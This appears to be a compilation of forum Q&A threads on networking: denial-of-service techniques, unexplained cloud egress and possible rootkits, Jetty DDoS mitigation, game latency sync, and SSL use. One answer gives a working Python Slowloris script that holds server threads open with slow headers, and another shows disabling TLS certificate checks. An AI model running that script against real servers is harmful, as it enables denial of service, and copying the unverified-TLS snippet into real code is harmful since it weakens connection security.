I noticed that most DoS attacks basically exhaust bandwidth. Is there any DoS attack that can shut down the target's server without exhausting its network resources?
That kind of attack is based on vulnerabilities in the server implementation.
One of the awesome ones is Slowloris, which exploits Apache's thread-per-connection design: it opens many connections and keeps each one alive by sending request headers very slowly, tying up every worker thread while using almost no bandwidth.
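To make the mechanism concrete, here is a minimal Python sketch of the technique, for experimenting against your own test server only (the target, connection count, and header name are placeholders):

    import socket
    import time

    TARGET = ("localhost", 80)   # your own test Apache instance
    NUM_CONNECTIONS = 200

    # Open many connections and start, but never finish, an HTTP request.
    sockets = []
    for _ in range(NUM_CONNECTIONS):
        s = socket.create_connection(TARGET, timeout=5)
        s.send(b"GET / HTTP/1.1\r\nHost: localhost\r\n")  # header block left open
        sockets.append(s)

    # Periodically trickle one more header line per connection so the server
    # keeps waiting for the request to complete, holding its thread hostage.
    # (Real tools also handle dropped sockets and reconnect; omitted here.)
    while True:
        time.sleep(10)
        for s in sockets:
            s.send(b"X-Keep-Waiting: 1\r\n")

Each connection costs the sender only a few bytes every ten seconds, yet pins an entire worker thread, which is why the attack needs so little bandwidth.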
Our network egress charges are growing month over month. Going by the cost, we are egressing upwards of 800 GB a month, around 300 KB/s on average (600 KB/s during the day, 200 KB/s at night).
I analyzed every script that could be sending out data, but none of them sends data at this volume. I turned them off one by one, and it made little difference.
I briefly turned on VPC flow logs, then downloaded and analyzed them. The traffic is spread across many IPs: about 300 different IPs per minute, averaging 10-12 KB each, so roughly 3.3 MB/min. No single IP stood out.
I noticed most of them were using port 443.
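If you export the flow logs as JSON lines, a short script can confirm whether any destination dominates. This is only a sketch; the file name is a placeholder, and the field names (jsonPayload.connection.dest_ip, jsonPayload.bytes_sent) should be checked against your actual export:

    import json
    from collections import Counter

    totals = Counter()
    with open("vpc_flow_logs.json") as f:      # placeholder file name
        for line in f:
            payload = json.loads(line).get("jsonPayload", {})
            dest = payload.get("connection", {}).get("dest_ip", "unknown")
            totals[dest] += int(payload.get("bytes_sent", 0))

    # Print the top 20 destinations by total egress.
    for ip, nbytes in totals.most_common(20):
        print(f"{ip:>15}  {nbytes / 1e6:8.1f} MB")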
When I use nethogs to identify the process doing most of the egress, it only points to Apache, and only shows about 50 KB/s. Where is the rest of the egress?
I mooted the possibility of a DDoS attack, but that should show up in the Apache access logs, and they do not show any suspicious IP/URL.
I'm looking for hints on the direction I should take. Apologies if I've omitted any crucial detail you need to analyze the issue; I will keep adding more details to the question.
If you suspect a DDoS attack has already happened, I would recommend using Cloud Armor, but before that, check that you have followed all the mitigations for avoiding DDoS attacks:
https://cloud.google.com/files/GCPDDoSprotection-04122016.pdf
What you're experiencing is most probably a DDoS attack, just as sankar wrote.
By your account, nothing stands out in the logs, which makes the DDoS theory more probable.
Using Cloud Armor seems the easiest way to protect your server/app out of the box without too much effort, since one of its key features is Adaptive Protection:
Google Cloud Armor Adaptive Protection helps you protect your Google Cloud applications, websites, and services against L7 distributed denial-of-service (DDoS) attacks such as HTTP floods and other high-frequency layer 7 (application-level) malicious activity. Adaptive Protection builds machine-learning models that do the following:
Detect and alert on anomalous activity
Generate a signature describing the potential attack
Generate a custom Google Cloud Armor WAF rule to block the signature
This way you will be able to avoid most attacks of that kind and save money. Even though you pay for this feature, it should still be beneficial in terms of cost, not to mention that your server will be a lot more secure and you can focus on other things.
---------- U P D A T E --------------
There may be one more reason.
A rootkit typically patches the kernel or other software libraries to alter the behavior of the operating system. Once this is happening, you cannot trust anything that the operating system tells you.
This way typical tools won't show the traffic or any suspicious processes.
Have a look at rootkit-detection tools such as chkrootkit and rkhunter, which may help you find one.
Jetty currently ships a DoSFilter, which appears to provide protection against DoS attacks: it keeps track of the number of requests from a connection. In a DDoS attack, we expect traffic from millions of IP addresses, in which case the DoSFilter won't do the job. Is there any other strategy you could apply here so that Jetty could survive?
Dealing with millions of IP addresses would need a solution that acts before the connection is accepted: some kind of OS or network-hardware solution.
Jetty, being a server, has to accept the connection in order to do anything with it.
You could probably use the Jetty request log and a custom fail2ban setup to ban IP addresses at the OS level based on criteria in the access log: too many requests from an IP over X amount of time triggers a DoSFilter-style action, and that IP is banned at the OS level for Y amount of time.
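For illustration, a rough Python sketch of the idea that fail2ban automates, assuming an NCSA-format request log where the client IP is the first field (the log path, thresholds, and iptables ban are placeholders you would tune):

    import re
    import subprocess
    import time
    from collections import defaultdict, deque

    LOG_PATH = "/var/log/jetty/request.log"   # placeholder path
    WINDOW_SECS = 10                          # X: look-back window
    MAX_REQUESTS = 100                        # requests allowed per window

    hits = defaultdict(deque)   # ip -> timestamps of recent requests
    banned = set()

    def ban(ip):
        # Drop all further packets from this IP (Linux, requires root).
        subprocess.run(["iptables", "-I", "INPUT", "-s", ip, "-j", "DROP"],
                       check=True)
        banned.add(ip)

    def process_line(line):
        match = re.match(r"(\S+)", line)
        if not match or match.group(1) in banned:
            return
        ip = match.group(1)
        now = time.time()
        window = hits[ip]
        window.append(now)
        # Discard timestamps that have fallen out of the window.
        while window and window[0] < now - WINDOW_SECS:
            window.popleft()
        if len(window) > MAX_REQUESTS:
            ban(ip)

    def follow(path):
        # Tail the log file, yielding lines as they are appended.
        with open(path) as f:
            f.seek(0, 2)   # start at end of file
            while True:
                line = f.readline()
                if line:
                    yield line
                else:
                    time.sleep(0.5)

    for line in follow(LOG_PATH):
        process_line(line)

fail2ban does the same thing more robustly (unbanning after Y amount of time, surviving restarts), so in practice you would write a fail2ban filter rather than run a script like this.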
If I have a server running on my machine, and several clients running on other networks, what are some approaches for testing synchronization between them? How would I know when a client goes out of sync?
I'm particularly interested in how network programmers in the field of game design do this (or in any application with continuous network exchange), where real-time synchronization is commonly vital to success.
I can see how this might easily be achieved on a LAN via side-by-side comparisons on separate machines... but once you extend the scenario to include clients on foreign networks, I'm just not sure how it can be done without clogging up your messaging system with debug information, which would itself change how well things stay in sync compared to running without that debug traffic on the network.
So what are some ways that people get around this issue?
For example, do they simply induce/simulate latency on the local network before launching to foreign networks, and then hope for the best? I'm hoping there are some more concrete solutions, but this is what I'm doing in the meantime...
When you say synchronized, I believe you are talking about network latency: a client on a local network may get its gaming information sooner than a client on the other side of the country. Correct?
If so, then I'm sure you can look for books or papers that cover this kind of topic, but I can give you at least one way to detect this latency and provide a way to manage it.
To detect latency, your server can use a traceroute-style probe to determine how long data takes to reach each client (a common Linux example: http://linux.about.com/library/cmd/blcmdl8_traceroute.htm). While the server is handling client data, it can continuously collect these latency statistics and share them with the clients. For example, the server can tell each client its own network latency and the longest latency among the group of clients playing each other in a game.
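As a simpler stand-in for traceroute, the server can just measure round-trip time. A Python sketch using TCP connect timing (the host and port are placeholders; in a real game you would more likely timestamp ping/pong messages over the existing connection):

    import socket
    import time

    def rtt_ms(host, port):
        # Time how long a TCP connection takes to establish: a rough
        # round-trip-time estimate that needs no root privileges.
        start = time.perf_counter()
        with socket.create_connection((host, port), timeout=5):
            pass
        return (time.perf_counter() - start) * 1000

    print(rtt_ms("client.example.net", 9000))   # placeholder client endpoint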
The clients can then use the latency differences to decide when to process the data they receive from the server. For example, a client is told by the server that its network latency is 50 milliseconds and that the maximum latency in its group is 300 milliseconds. The client then knows to wait 250 milliseconds before processing game data from the server, so that each client processes the data at approximately the same time.
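A minimal sketch of that buffering idea (the class and field names are invented for illustration):

    import heapq
    import time

    class DelayBuffer:
        """Holds server updates until the slowest client in the group
        would also have received them."""

        def __init__(self, own_latency_ms, max_group_latency_ms):
            self.extra_delay = (max_group_latency_ms - own_latency_ms) / 1000.0
            self.pending = []   # min-heap of (release_time, seq, update)
            self.seq = 0        # tiebreaker so the heap never compares updates

        def on_receive(self, update):
            release = time.monotonic() + self.extra_delay
            heapq.heappush(self.pending, (release, self.seq, update))
            self.seq += 1

        def ready_updates(self):
            now = time.monotonic()
            out = []
            while self.pending and self.pending[0][0] <= now:
                out.append(heapq.heappop(self.pending)[2])
            return out

    # A client with 50 ms latency in a group whose slowest member has
    # 300 ms waits an extra 250 ms before applying each update.
    buf = DelayBuffer(own_latency_ms=50, max_group_latency_ms=300)
    buf.on_receive({"tick": 1})
    time.sleep(0.3)
    print(buf.ready_updates())   # -> [{'tick': 1}]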
There are many other (and probably better) ways to handle this situation, but that should get you started in the right direction.
I am trying to implement a web service and web client applications using Ruby on Rails 3. For that I am considering using SSL, but I would like to know: how "heavy" is it for servers to handle many HTTPS connections instead of HTTP? What is the difference in response time and overall performance?
The cost of the SSL/TLS handshake (which accounts for most of the overall "slowdown" SSL/TLS adds) is nowadays much less than the cost of TCP connection establishment and other actions associated with session establishment (logging, user lookup, etc.). And if you worry about speed and want to save every nanosecond, there are hardware SSL accelerators you can install in your server.
Going over HTTPS is several times slower, but most of the time that is not what will actually slow your app down. Especially on Rails, your performance scaling will be bottlenecked elsewhere in the system. If you are passing secrets of any kind over the wire (including a shared session cookie), SSL is the only way to go, and you probably won't notice the cost. If you do scale to the point where encryption becomes a measurable hit, there are hardware acceleration appliances that help tremendously; however, Rails is likely to fall over long before that point.
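If you want numbers for your own app rather than folklore, a quick measurement is easy. A Python sketch (the URLs are placeholders; using a fresh session per request forces a new TCP and TLS handshake each time, so the handshake cost is included):

    import time
    import requests

    def avg_request_time(url, n=50):
        total = 0.0
        for _ in range(n):
            with requests.Session() as s:   # new connection every iteration
                start = time.perf_counter()
                s.get(url)
                total += time.perf_counter() - start
        return total / n

    print("HTTP :", avg_request_time("http://your-app.example.com/"))
    print("HTTPS:", avg_request_time("https://your-app.example.com/"))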
Inside of large companies, is it standard practice to use SSL (e.g. https) for running corporate apps over the LAN? I am thinking of ERP systems, SFA systems, HR systems, etc. But I am also thinking of SOA: web service providers and consumers.
In other words, is there any concern that something on the LAN could be sniffing plaintext info going around? If not SSL, how is this security threat dealt with?
What's your experience?
Inside of large companies, is it standard practice to use SSL (e.g. https) for running corporate apps over the LAN?
Generally, SSL for LAN-only internal applications is not common practice. Historically the LAN has been viewed as a "trusted" network, so SSL for LAN apps hasn't been a priority.
Also, connection to internal application servers is usually via an authenticated proxy, which in itself mitigates some of the risk.
This is slowly changing, however, as organisations increasingly treat the LAN with less trust.
If not SSL, how is this security threat dealt with?
Most enterprises do monitor what is attached to their LAN and record events when new devices are added.
If the device doesn't correspond to something planned (e.g., a new desktop or printer), then it is investigated.
Unauthorised devices are seen as a much greater risk (than not using SSL) because they pose additional threats, like introducing a virus, an external network connection, or some other kind of attack vector.
It really depends on what you consider a "large company". The company I work at has over 50,000 employees, so our corporate network is really not much more trustworthy than the Internet.
We do use SSL on corporate Intranet web applications. We have our own internal CA certificate installed on all corporate PCs, so we can issue our own internal SSL certificates in-house.
Unfortunately, no, it's not standard practice.
What's done and what should be done are not necessarily the same here...
Without a doubt, any system with confidential information should be secured, especially on a LAN, as that's where most attacks originate (disgruntled employees, etc.).
Unfortunately, it's often not the case.
Yep, pretty standard practice in a lot of places I've seen.
I think the reasons why should be obvious:
Extra security against common attacks
Pretty much no reason not to
Inside of large companies, is it standard practice to use SSL (e.g. https) for running corporate apps over the LAN? I am thinking of ERP systems, SFA systems, HR systems, etc. But I am also thinking of SOA: web service providers and consumers.
I would feel very uncomfortable if such apps weren't secured. In many places I've worked, they were; in some others they weren't, which I consider unprofessional.
In other words, is there any concern that something on the LAN could be sniffing plaintext info going around?
For me, the answer is obviously YES.
If not SSL, how is this security threat dealt with?
One-time passwords (with RSA SecurID).
I wonder if part of the problem is that moving to SSL always seems a bit more complicated than it should be. If one could enable SSL with a single switch, without having to worry about certificates, then at least the encryption part could become the default.
Obviously you wouldn't get endpoint authentication without taking the extra step of setting up certificates, but then at least there would be truly no reason to go without encryption.
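That split between encryption and endpoint authentication is visible in, for example, Python's ssl module, where a client can keep the encryption but switch off certificate verification (shown only to illustrate the distinction, and with a placeholder URL; don't do this against services you need to trust):

    import ssl
    import urllib.request

    # Encrypts the connection but skips certificate and hostname checks,
    # i.e. encryption without endpoint authentication.
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE

    with urllib.request.urlopen("https://intranet.example.com/", context=ctx) as r:
        print(r.status)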